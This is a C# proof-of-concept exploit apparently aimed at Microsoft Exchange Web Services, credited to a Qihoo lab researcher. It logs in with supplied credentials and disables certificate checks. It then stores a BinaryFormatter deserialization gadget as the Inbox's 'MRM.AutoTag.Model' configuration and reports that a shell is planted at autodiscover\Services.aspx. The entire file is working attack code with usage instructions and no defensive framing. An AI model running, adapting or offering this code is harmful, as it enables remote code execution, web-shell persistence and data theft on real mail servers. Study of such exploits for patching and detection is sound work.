﻿using Microsoft.Exchange.WebServices.Data;
using System;
using System.Net;


namespace exploit
{
    class Program
    {
        static readonly string GADGET_TYPE = "BinaryFormatter";
        
        static void Main(string[] args)
        {
            ActivitySurrogateSelectorGenerator asg = new ActivitySurrogateSelectorGenerator();
            // Retrieve gadget 
            if (args.Length != 3)
            {
                Console.WriteLine("[*] Usage: Exp mail.test.cc user pass");
                Console.WriteLine("[*] Powered by Boi from LintonLab at Qihoo Group");
                return ;
            }
            byte[] obj = (byte[])asg.Generate("", GADGET_TYPE, false);
            Console.WriteLine(GADGET_TYPE);
           
            string b64obj = System.Convert.ToBase64String(obj);
            ExchangeService service = new ExchangeService(ExchangeVersion.Exchange2010)
            {
                Credentials = new WebCredentials(args[1], args[2])
            };
            ServicePointManager.ServerCertificateValidationCallback +=(sender, cert, chain, sslPolicyErrors) => true;
            Console.WriteLine("[+] Target: https://" + args[0] + "/ews/Exchange.asmx");
            Console.WriteLine("[+] User: "+args[1]+" "+args[2]);
            service.Url = new Uri("https://"+args[0]+"/ews/Exchange.asmx");
            {
                byte[] data = obj;
                UserConfiguration u = null;
                Folder folder = Folder.Bind(service, WellKnownFolderName.Inbox);
                try
                {
                    u = UserConfiguration.Bind(service, "MRM.AutoTag.Model", folder.Id, UserConfigurationProperties.BinaryData);
                    u.Delete();
                }
                catch { }
                u = new UserConfiguration(service)
                {
                    BinaryData = data
                };
                u.Save("MRM.AutoTag.Model", folder.Id);
            }

            Console.WriteLine("[+] Shell in "+args[0]+"\\autodiscover\\Services.aspx, Wait for few minutes");
            

        }
    }
}
